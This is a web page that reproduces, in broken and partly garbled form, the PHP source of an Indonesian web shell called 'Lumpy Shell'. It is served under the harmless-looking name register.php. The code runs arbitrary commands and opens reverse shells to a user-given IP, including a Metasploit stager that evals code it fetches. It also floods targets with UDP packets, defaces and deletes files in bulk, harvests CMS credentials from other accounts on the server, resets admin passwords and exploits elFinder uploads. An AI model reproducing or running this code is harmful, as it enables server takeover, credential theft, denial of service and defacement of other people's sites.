Uncategorized

register.php

Mr.LumpiDotID

Password



Lumpy Shell

“.$perm.”“; } else { return ““.$perm.”“; } } function r($dir,$perm) { if(!is_readable($dir)) { return ““.$perm.”“; } else { return ““.$perm.”“; } } function exe($cmd) { if(function_exists(‘system’)) { @ob_start(); @system($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(‘exec’)) { @exec($cmd,$results); $buff = “”; foreach($results as $result) { $buff .= $result; } return $buff; } elseif(function_exists(‘passthru’)) { @ob_start(); @passthru($cmd); $buff = @ob_get_contents(); @ob_end_clean(); return $buff; } elseif(function_exists(‘shell_exec’)) { $buff = @shell_exec($cmd); return $buff; } } function perms($file){ $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = ‘s’; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = ‘l’; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = ‘-‘; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = ‘b’; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = ‘d’; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = ‘c’; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = ‘p’; } else { // Unknown $info = ‘u’; } // Owner $info .= (($perms & 0x0100) ? ‘r’ : ‘-‘); $info .= (($perms & 0x0080) ? ‘w’ : ‘-‘); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? ‘s’ : ‘x’ ) : (($perms & 0x0800) ? ‘S’ : ‘-‘)); // Group $info .= (($perms & 0x0020) ? ‘r’ : ‘-‘); $info .= (($perms & 0x0010) ? ‘w’ : ‘-‘); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? ‘s’ : ‘x’ ) : (($perms & 0x0400) ? ‘S’ : ‘-‘)); // World $info .= (($perms & 0x0004) ? ‘r’ : ‘-‘); $info .= (($perms & 0x0002) ? ‘w’ : ‘-‘); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? ‘t’ : ‘x’ ) : (($perms & 0x0200) ? ‘T’ : ‘-‘)); return $info; } function hdd($s) { if($s >= 1073741824) return sprintf(‘%1.2f’,$s / 1073741824 ).’ GB’; elseif($s >= 1048576) return sprintf(‘%1.2f’,$s / 1048576 ) .’ MB’; elseif($s >= 1024) return sprintf(‘%1.2f’,$s / 1024 ) .’ KB’; else return $s .’ B’; } function ambilKata($param, $kata1, $kata2){ if(strpos($param, $kata1) === FALSE) return FALSE; if(strpos($param, $kata2) === FALSE) return FALSE; $start = strpos($param, $kata1) + strlen($kata1); $end = strpos($param, $kata2, $start); $return = substr($param, $start, $end – $start); return $return; } function getsource($url) { $curl = curl_init($url); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true); curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false); $content = curl_exec($curl); curl_close($curl); return $content; } function bing($dork) { $npage = 1; $npages = 30000; $allLinks = array(); $lll = array(); while($npage <= $npages) { $x = getsource("http://www.bing.com/search?q=".$dork."&first=".$npage); if($x) { preg_match_all('#

ON” : “OFF“; $ds = @ini_get(“disable_functions”); $mysql = (function_exists(‘mysql_connect’)) ? “ON” : “OFF“; $curl = (function_exists(‘curl_version’)) ? “ON” : “OFF“; $wget = (exe(‘wget –help’)) ? “ON” : “OFF“; $perl = (exe(‘perl –help’)) ? “ON” : “OFF“; $python = (exe(‘python –help’)) ? “ON” : “OFF“; $show_ds = (!empty($ds)) ? “$ds” : “NONE“; if(!function_exists(‘posix_getegid’)) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = “?”; } else { $uid = @posix_getpwuid(posix_geteuid()); $gid = @posix_getgrgid(posix_getegid()); $user = $uid[‘name’]; $uid = $uid[‘uid’]; $group = $gid[‘name’]; $gid = $gid[‘gid’]; } echo ‘

“; if($_GET[‘logout’] == true) { unset($_SESSION[md5($_SERVER[‘HTTP_HOST’])]); echo “sset($_POST[‘Submit’])){ $ceks = array(‘base64_decode’,’system’,’passthru’,’popen’,’exec’,’shell_exec’,’eval’,’move_uploaded_file’); foreach($ceks as $ceker){ if($_POST[$ceker]<>“”){ $six.=$_POST[$ceker].”.”; } } $cek = explode(‘.’, $six); function ListFiles($dir) { if($dh = opendir($dir)) { $files = Array(); $inner_files = Array(); while($file = readdir($dh)) { if($file != “.” && $file != “..”) { if(is_dir($dir . “/” . $file)) { $inner_files = ListFiles($dir . “/” . $file); if(is_array($inner_files)) $files = array_merge($files, $inner_files); } else { array_push($files, $dir . “/” . $file); } } } closedir($dh); return $files; } } ?>


$file){ $nFile = substr($file, -4, 4); if($nFile == “.php”){ if($file==$_SERVER[‘DOCUMENT_ROOT’].$_SERVER[‘PHP_SELF’]){ }else{ $ops = @file_get_contents($file); $op=strtolower($ops); $arr = array(‘c99_buff_prepare’ => ‘c 9 9’, ‘abcr57’ => ‘r 5 7’); $sis=0; if($op) $size=filesize($file); $last=date(“M-d-Y H:i”, $last_modified); foreach($arr as $key => $val) { if(@preg_match(“/$key/”, $op)) { $sis=1; $i++; ?>

“1”){ if((@preg_match(“/system\((.*?)\)/”, $op))&&(@preg_match(“/ 

/", $op))&&(@preg_match("/empty\((.*?)\)/", $op))) { $sis="2"; $i++; $val="hidden shell"; ?>
""){ if(@preg_match("/$bugs\((.*?)\)/", $op)) { $i++; ?> ""){ $text=$_POST['textV']; if(@preg_match("/$text/", $op)) { $i++; ?> ""){ $x++; ?>
No T y p e F i l e��L o c a t i o n L a s t��E d i t F i l e��S i z e
GMT+9 byte
GMT+9 byte
GMT+9 byte
GMT+9 byte
not exist no record -����byte





'; echo '
'; echo 'IP:


'; echo 'Port:
'; echo '
'; echo '
'; if(isset($_GET['ip']) && isset($_GET['port'])){ $ip = $_GET['ip']; $port = $_GET['port']; $bc = fopen("/tmp/bxcon.pl","w"); fwrite($bc,'#!/usr/bin/perl use Socket; $iaddr=inet_aton("'.$ip.'") || die("Error: $!\n"); $paddr=sockaddr_in("'.$port.'", $iaddr) || die("Error: $!\n"); $proto=getprotobyname("tcp"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); open(STDIN, ">&SOCKET"); open(STDOUT, ">&SOCKET"); open(STDERR, ">&SOCKET"); system("/bin/sh -i"); close(STDIN); close(STDOUT); close(STDERR);'); fclose($bc); shell_exec("perl /tmp/bxcon.pl"); unlink("/tmp/bxcon.pl"); } break; echo '
xB1N4RYx ~ 2012

'; function rooting() { echo 'Sw Bilgi

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Yuklendi

'; } else { echo 'Basarisiz

'; } } } $x = $_GET["x"]; Switch($x){ case "rooting"; rooting(); break; } }elseif($_GET['do'] == 'infosys') { echo '

"; } elseif($_GET['do'] == 'about') { ?>
Discovering And Exploiting Security Flaws.

Thanks To : Rinto AR , ShinChan , PETR03X , Mr.x0x , IndoXploit, And Member N45HT
JOIN TO GROUP OFFICIAL N45HT

Terserah Shell Create By LugiX From N45HT Crew CSRF EXPLOITER ONLINE





*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc
URL:
POST File:


NB: Jika Mau Jalankan Tools ini, Belakang Domain Tambahkan " / "

Crot ".$url."

"; $adminlocales = array("-adminweb/","!adminweb/","@adminweb/","adminweb121/","adminweb90/","adminweb145/","khususadmin/","rahasiaadm/","adminweb123123/","adminweb2222/","adminlanel/","adminlanel.php/","monitor123.php/","masuk.php/","css.php/", "admin1235.php/", "master.php/","1admin/","123admin/","addmin/","home.php","css/","rediect.php/","masuk.php/","index.php/","webpaneladmin123/","registeradm/","register/","member123/","123adminweb/","123paneladminweb/","panelauth1231/","loginadminweb21/","loginadminweb123/","loginadminweb/","webadmin123/","redakturadmin/","paneladminweb/","admloginadm/","4dm1n/","admin12345/","adminweb12/","adminweb111/","adminweb123/","adminweb1/","gangmasuk/","gangadmin/","admredaktur/","adminwebredaktur/","adminredaktur/","adm/", "_adm_/", "_admin_/", "_loginadm_/", "_login_admin_/", "minmin", "loginadmin3/", "masuk/admin", "webmail", "_loginadmin_/", "_login_admin.php_/", "_admin_/", "_administrator_/", "operator/", "sika/", "adminweb/", "develop/", "ketua/", "redaktur/", "author/", "admin/", "administrator/", "adminweb/", "user/", "users/", "dinkesadmin/", "retel/", "author/", "panel/", "paneladmin/", "panellogin/", "redaksi/", "cp-admin/", "login@web/", "admin1/", "admin2/", "admin3/", "admin4/", "admin5/", "admin6/", "admin7", "admin8", "admin9", "admin10", "master/", "master/index.php", "master/login.php", "operator/index.php", "sika/index.php", "develop/index.php", "ketua/index.php","redaktur/index.php", "admin/index.php", "administrator/index.php", "adminweb/index.php", "user/index.php", "users/index.php", "dinkesadmin/index.php", "retel/index.php", "author/index.php", "panel/index.php", "paneladmin/index.php", "panellogin/index.php", "redaksi/index.php", "cp-admin/index.php", "operator/login.php", "sika/login.php", "develop/login.php", "ketua/login.php", "redaktur/login.php", "admin/login.php", "administrator/login.php", "adminweb/login.php", "user/login.php", "users/login.php", "dinkesadmin/login.php", "retel/login.php", "author/login.php", "panel/login.php", "paneladmin/login.php", "panellogin/login.php", "redaksi/login.php", "cp-admin/login.php", "terasadmin/", "terasadmin/index.php", "terasadmin/login.php", "rahasia/", "rahasia/index.php", "rahasia/admin.php", "rahasia/login.php", "dinkesadmin/", "dinkesadmin/login.php", "adminpmb/", "adminpmb/index.php", "adminpmb/login.php", "system/", "system/index.php", "system/login.php", "webadmin/", "webadmin/index.php", "webadmin/login.php", "wpanel/", "wpanel/index.php", "wpanel/login.php", "adminpanel/index.php", "adminpanel/", "adminpanel/login.php", "adminkec/", "adminkec/index.php", "adminkec/login.php", "admindesa/", "admindesa/index.php", "admindesa/login.php", "adminkota/", "adminkota/index.php", "adminkota/login.php", "admin123/", "admin123/index.php", "dologin/", "home.asp/","supervise/amdin", "relogin/adm", "checkuser", "relogin.php", "relogin.asp", "wp-admin", "registration", "suvervise", "superman.php", "member.php","home/admin","po-admin/","do_login.php", "bo-login", "bo_login.php/", "index.php/admin", "admiiin.php", "masuk/adm","website_login/", "dashboard/admin", "dashboard.php", "dashboard_adm", "admin123/login.php", "logout1/", "logout/","pengelola/login", "manageradm/", "logout.asp", "manager/adm", "pengelola/web","auth/panel", "logout/index.php", "logout/login.php", "controladm/", "logout/admin.php", "adminweb_setting", "adm/index.asp", "adm.asp", "affiliate.asp", "adm_auth.asp", "memberadmin.asp", "siteadmin/login.asp", "siteadmin/login", "paneldecontrol", "cms/admin", "administracion.php", "/ADMON/", "administrador/", "panelc/", "admincp", "admcp", "cp", "modcp", "moderatorcp", "adminare", "cpanel", "controlpanel"); foreach ($adminlocales as $admin){ $headers = get_headers("$url$admin"); if (eregi('200', $headers[0])) { echo "$url$admin Ketemu Nih !
"; } else { echo "$url$admin Tidak Ketemu
"; } } } } elseif($_GET['do'] == 'cmd') { echo "
".$user."@".$ip.": ~ $
"; if($_POST['do_cmd']) { echo "
".exe($_POST['cmd'])."

"; } } elseif($_GET['do'] == 'mass_deface') { function sabun_massal($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $lokasi
"; file_put_contents($lokasi, $isi_script); $idx = sabun_massal($dirc,$namafile,$isi_script); } } } } } } function sabun_biasa($dir,$namafile,$isi_script) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { file_put_contents($lokasi, $isi_script); } elseif($dirb === '..') { file_put_contents($lokasi, $isi_script); } else { if(is_dir($dirc)) { if(is_writable($dirc)) { echo "[DONE] $dirb/$namafile
"; file_put_contents($lokasi, $isi_script); } } } } } } if($_POST['start']) { if($_POST['tipe_sabun'] == 'mahal') { echo "

"; sabun_massal($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "

"; } elseif($_POST['tipe_sabun'] == 'murah') { echo "

"; sabun_biasa($_POST['d_dir'], $_POST['d_file'], $_POST['script']); echo "

"; } } else { echo "

"; echo "
Tipe Sabun:
BiasaMassal
Folder:

Filename:

Index File:

"; } } elseif($_GET['do'] == 'ddos') { ?>

Your IP: �(Don't DoS yourself nub)

Ddos Tool
IP Target :
Time :
Port :


Seteleh selesai menggunakan tools ini segera refresh browsingmu

$max_time) { break; } $fp = fsockopen("udp://$ip", $rand, $errno, $errstr, 5); if ($fp) { fwrite($fp, $out); fclose($fp); } } echo "Packet complete at " . time('h:i:s') . " with $packets (" . round(($packets * 65) / 1024, 2) . " mB) packets averaging " . round($packets / $exec_time, 2) . " packets/s "; } } elseif($_GET['do'] == 'mass_delete') { function hapus_massal($dir,$namafile) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $lokasi = $dirc.'/'.$namafile; if($dirb === '.') { if(file_exists("$dir/$namafile")) { unlink("$dir/$namafile"); } } elseif($dirb === '..') { if(file_exists("".dirname($dir)."/$namafile")) { unlink("".dirname($dir)."/$namafile"); } } else { if(is_dir($dirc)) { if(is_writable($dirc)) { if(file_exists($lokasi)) { echo "[DELETED] $lokasi
"; unlink($lokasi); $idx = hapus_massal($dirc,$namafile); } } } } } } } if($_POST['start']) { echo "
"; hapus_massal($_POST['d_dir'], $_POST['d_file']); echo "

"; } else { echo "

"; echo "
Folder:

Filename:

"; } } elseif($_GET['do'] == 'config') { $etc = fopen("/etc/passwd", "r") or die(" 
Can't read /etc/passwd

"); $idx = mkdir("idx_config", 0777); $isi_htc = "Options all\nRequire None\nSatisfy Any"; $htc = fopen("idx_config/.htaccess","w"); fwrite($htc, $isi_htc); while($passwd = fgets($etc)) { if($passwd == "" || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_config); foreach($user_config[1] as $user_idx) { $user_config_dir = "/home/$user_idx/public_html/"; if(is_readable($user_config_dir)) { $grab_config = array( "/home/$user_idx/.my.cnf" => "cpanel", "/home/$user_idx/.accesshash" => "WHM-accesshash", "/home/$user_idx/public_html/po-content/config.php" => "Popoji", "/home/$user_idx/public_html/vdo_config.php" => "Voodoo", "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb", "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia", "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia", "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS", "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS", "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS", "/home/$user_idx/public_html/forum/config.php" => "phpBB", "/home/$user_idx/public_html/sites/default/settings.php" => "Drupal", "/home/$user_idx/public_html/config/settings.inc.php" => "PrestaShop", "/home/$user_idx/public_html/app/etc/local.xml" => "Magento", "/home/$user_idx/public_html/joomla/configuration.php" => "Joomla", "/home/$user_idx/public_html/configuration.php" => "Joomla", "/home/$user_idx/public_html/wp/wp-config.php" => "WordPress", "/home/$user_idx/public_html/wordpress/wp-config.php" => "WordPress", "/home/$user_idx/public_html/wp-config.php" => "WordPress", "/home/$user_idx/public_html/admin/config.php" => "OpenCart", "/home/$user_idx/public_html/slconfig.php" => "Sitelok", "/home/$user_idx/public_html/application/config/database.php" => "Ellislab"); foreach($grab_config as $config => $nama_config) { $ambil_config = file_get_contents($config); if($ambil_config == '') { } else { $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w"); fputs($file_config,$ambil_config); } } } } } } echo "

Done
"; } elseif($_GET['do'] == 'jumping') { $i = 0; echo "
"; if(preg_match("/hsphere/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo " 
"; foreach($urls as $url) { $url = str_replace(array("http://","www."), "", strtolower($url)); $etc = "/etc/passwd"; $f = fopen($etc,"r"); while($gets = fgets($f)) { $pecah = explode(":", $gets); $user = $pecah[0]; $dir_user = "/hsphere/local/home/$user"; if(is_dir($dir_user) === true) { $url_user = $dir_user."/".$url; if(is_readable($url_user)) { $i++; $jrw = "[R] $url_user"; if(is_writable($url_user)) { $jrw = "[RW] $url_user"; } echo $jrw."
"; } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".$ip; } echo "

"; } else { echo '


List Domains:

'; } } elseif(preg_match("/vhosts/", $dir)) { $urls = explode("\r\n", $_POST['url']); if(isset($_POST['jump'])) { echo " 
"; foreach($urls as $url) { $web_vh = "/var/www/vhosts/$url/httpdocs"; if(is_dir($web_vh) === true) { if(is_readable($web_vh)) { $i++; $jrw = "[R] $web_vh"; if(is_writable($web_vh)) { $jrw = "[RW] $web_vh"; } echo $jrw."
"; } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".$ip; } echo "

"; } else { echo '


List Domains:

'; } } else { echo " 
"; $etc = fopen("/etc/passwd", "r") or die("Can't read /etc/passwd"); while($passwd = fgets($etc)) { if($passwd == '' || !$etc) { echo "Can't read /etc/passwd"; } else { preg_match_all('/(.*?):x:/', $passwd, $user_jumping); foreach($user_jumping[1] as $user_idx_jump) { $user_jumping_dir = "/home/$user_idx_jump/public_html"; if(is_readable($user_jumping_dir)) { $i++; $jrw = "[R] $user_jumping_dir"; if(is_writable($user_jumping_dir)) { $jrw = "[RW] $user_jumping_dir"; } echo $jrw; if(function_exists('posix_getpwuid')) { $domain_jump = file_get_contents("/etc/named.conf"); if($domain_jump == '') { echo " => ( gabisa ambil nama domain nya )
"; } else { preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump); foreach($domains_jump[1] as $dj) { $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj")); $user_jumping_url = $user_jumping_url['name']; if($user_jumping_url == $user_idx_jump) { echo " => ( $dj )
"; break; } } } } else { echo "
"; } } } } } if($i == 0) { } else { echo "
Total ada ".$i." Kamar di ".$ip; } echo "

"; } echo "

"; } elseif($_GET['do'] == 'autoklik') { ?>

$korban
"; echo "Done index.php
"; $url_mkfile = "$korban?cmd=mkfile&name=$global&target=l1_Lw"; $post1 = array( "target" => "l1_$encode", "content" => "$decode_isi",); $post2 = array( "upload[]" => "@$global",); $output_mkfile = ngirim("$korban", $post1); $upload_ah = ngirim("$korban?cmd=upload", $post2); } } ?>

$korba
"; echo "Done N45HT.php
"; $url_mkfil = "$korba?cmd=mkfile&name=$globa&targets=l1_Lw"; $post1 = array( "targets" => "l1_$encode", "content" => "$decode_isi",); $post2 = array( "upload[]" => "@$globa",); $output_mkfil = ngirim("$korban", $post1); $upload_as = ngirim("$korban?cmd=upload", $post2); } } } elseif($_GET['do'] == 'tool') { error_reporting(0); function ss($t){if (!get_magic_quotes_gpc()) return trim(urldecode($t));return trim(urldecode(stripslashes($t)));} $s_my_ip = gethostbyname($_SERVER['HTTP_HOST']);$rsport = "443";$rsportb4 = $rsport;$rstarget4 = $s_my_ip;$s_result = "


Reverse shell ( php )


Your IP
Port

Metasploit Connection

Your IP
Port

"; echo $s_result; if($_POST['metaConnect']){$ipaddr = $_POST['yip'];$port = $_POST['yport'];if ($ip == "" && $port == ""){echo "fill in the blanks";}else {if (FALSE !== strpos($ipaddr, ":")) {$ipaddr = "[". $ipaddr ."]";}if (is_callable('stream_socket_client')){$msgsock = stream_socket_client("tcp://{$ipaddr}:{$port}");if (!$msgsock){die();}$msgsock_type = 'stream';}elseif (is_callable('fsockopen')){$msgsock = fsockopen($ipaddr,$port);if (!$msgsock) {die(); }$msgsock_type = 'stream';}elseif (is_callable('socket_create')){$msgsock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);$res = socket_connect($msgsock, $ipaddr, $port);if (!$res) {die(); }$msgsock_type = 'socket';}else {die();}switch ($msgsock_type){case 'stream': $len = fread($msgsock, 4); break;case 'socket': $len = socket_read($msgsock, 4); break;}if (!$len) {die();}$a = unpack("Nlen", $len);$len = $a['len'];$buffer = '';while (strlen($buffer) < $len){switch ($msgsock_type) {case 'stream': $buffer .= fread($msgsock, $len-strlen($buffer)); break;case 'socket': $buffer .= socket_read($msgsock, $len-strlen($buffer));break;}}eval($buffer);echo "[*] Connection Terminated";die();}} if(isset($_REQUEST['sqlportb4'])) $rsportb4 = ss($_REQUEST['sqlportb4']); if(isset($_REQUEST['rstarget4'])) $rstarget4 = ss($_REQUEST['rstarget4']); if ($_POST['xback_php']) {$ip = $rstarget4;$port = $rsportb4;$chunk_size = 1337;$write_a = null;$error_a = null;$shell = '/bin/sh';$daemon = 0;$debug = 0;if(function_exists('pcntl_fork')){$pid = pcntl_fork(); if ($pid == -1) exit(1);if ($pid) exit(0);if (posix_setsid() == -1) exit(1);$daemon = 1;} umask(0);$sock = fsockopen($ip, $port, $errno, $errstr, 30);if(!$sock) exit(1); $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $process = proc_open($shell, $descriptorspec, $pipes); if(!is_resource($process)) exit(1); stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); while(1){if(feof($sock)) break;if(feof($pipes[1])) break;$read_a = array($sock, $pipes[1], $pipes[2]);$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if(in_array($sock, $read_a)){$input = fread($sock, $chunk_size);fwrite($pipes[0], $input);} if(in_array($pipes[1], $read_a)){$input = fread($pipes[1], $chunk_size);fwrite($sock, $input);} if(in_array($pipes[2], $read_a)){$input = fread($pipes[2], $chunk_size);fwrite($sock, $input);}}fclose($sock);fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);$rsres = " ";$s_result .= $rsres;} } elseif($_GET['do'] == 'auto_edit_user') { if($_POST['hajar']) { if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) { echo "username atau password harus lebih dari 6 karakter"; } else { $user_baru = $_POST['user_baru']; $pass_baru = md5($_POST['pass_baru']); $conf = $_POST['config_dir']; $scan_conf = scandir($conf); foreach($scan_conf as $file_conf) { if(!is_file("$conf/$file_conf")) continue; $config = file_get_contents("$conf/$file_conf"); if(preg_match("/JConfig|joomla/",$config)) { $dbhost = ambilkata($config,"host = '","'"); $dbuser = ambilkata($config,"user = '","'"); $dbpass = ambilkata($config,"password = '","'"); $dbname = ambilkata($config,"db = '","'"); $dbprefix = ambilkata($config,"dbprefix = '","'"); $prefix = $dbprefix."users"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result['id']; $site = ambilkata($config,"sitename = '","'"); $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Joomla
"; if($site == '') { echo "Sitename => error, gabisa ambil nama domain nya
"; } else { echo "Sitename => $site
"; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/WordPress/",$config)) { $dbhost = ambilkata($config,"DB_HOST', '","'"); $dbuser = ambilkata($config,"DB_USER', '","'"); $dbpass = ambilkata($config,"DB_PASSWORD', '","'"); $dbname = ambilkata($config,"DB_NAME', '","'"); $dbprefix = ambilkata($config,"table_prefix = '","'"); $prefix = $dbprefix."users"; $option = $dbprefix."options"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/wp-login.php
"; } $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => WordPress
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/Magento|Mage_Core/",$config)) { $dbhost = ambilkata($config,""); $dbuser = ambilkata($config,""); $dbpass = ambilkata($config,""); $dbname = ambilkata($config,""); $dbprefix = ambilkata($config,""); $prefix = $dbprefix."admin_user"; $option = $dbprefix."core_config_data"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'"); $result2 = mysql_fetch_array($q2); $target = $result2[value]; if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target/admin/
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => Magento
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) { $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'"); $dbuser = ambilkata($config,"'DB_USERNAME', '","'"); $dbpass = ambilkata($config,"'DB_PASSWORD', '","'"); $dbname = ambilkata($config,"'DB_DATABASE', '","'"); $dbprefix = ambilkata($config,"'DB_PREFIX', '","'"); $prefix = $dbprefix."user"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = ambilkata($config,"HTTP_SERVER', '","'"); if($target == '') { $url_target = "Login => error, gabisa ambil nama domain nyaa
"; } else { $url_target = "Login => $target
"; } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'"); echo "Config => ".$file_conf."
"; echo "CMS => OpenCart
"; echo $url_target; if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) { $dbhost = ambilkata($config,'server = "','"'); $dbuser = ambilkata($config,'username = "','"'); $dbpass = ambilkata($config,'password = "','"'); $dbname = ambilkata($config,'database = "','"'); $prefix = "users"; $option = "identitas"; $conn = mysql_connect($dbhost,$dbuser,$dbpass); $db = mysql_select_db($dbname); $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if($target == '') { $target2 = $result[url]; $url_target = "Login => error, gabisa ambil nama domain nyaa
"; if($target2 == '') { $url_target2 = "Login => error, gabisa ambil nama domain nyaa
"; } else { $cek_login3 = file_get_contents("$target2/adminweb/"); $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) { $url_target2 = "Login => $target2/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) { $url_target2 = "Login => $target2/lokomedia/adminweb
"; } else { $url_target2 = "Login => $target2 [ gatau admin login nya dimana :p ]"; } } } else { $cek_login = file_get_contents("$target/adminweb/"); $cek_login2 = file_get_contents("$target/lokomedia/adminweb/"); if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) { $url_target = "Login => $target/adminweb
"; } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) { $url_target = "Login => $target/lokomedia/adminweb
"; } else { $url_target = "Login => $target [ gatau admin login nya dimana :p ]"; } } $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'"); echo "Config => ".$file_conf."
"; echo "CMS => Lokomedia
"; if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) { echo $url_target2; } else { echo $url_target; } if(!$update OR !$conn OR !$db) { echo "Status => ".mysql_error()."

"; } else { echo "Status => sukses edit user, silakan login dengan user & pass yang baru.

"; } mysql_close($conn); } } } } else { echo "


Auto Edit User Config

DIR Config:

Set User & Pass:


NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
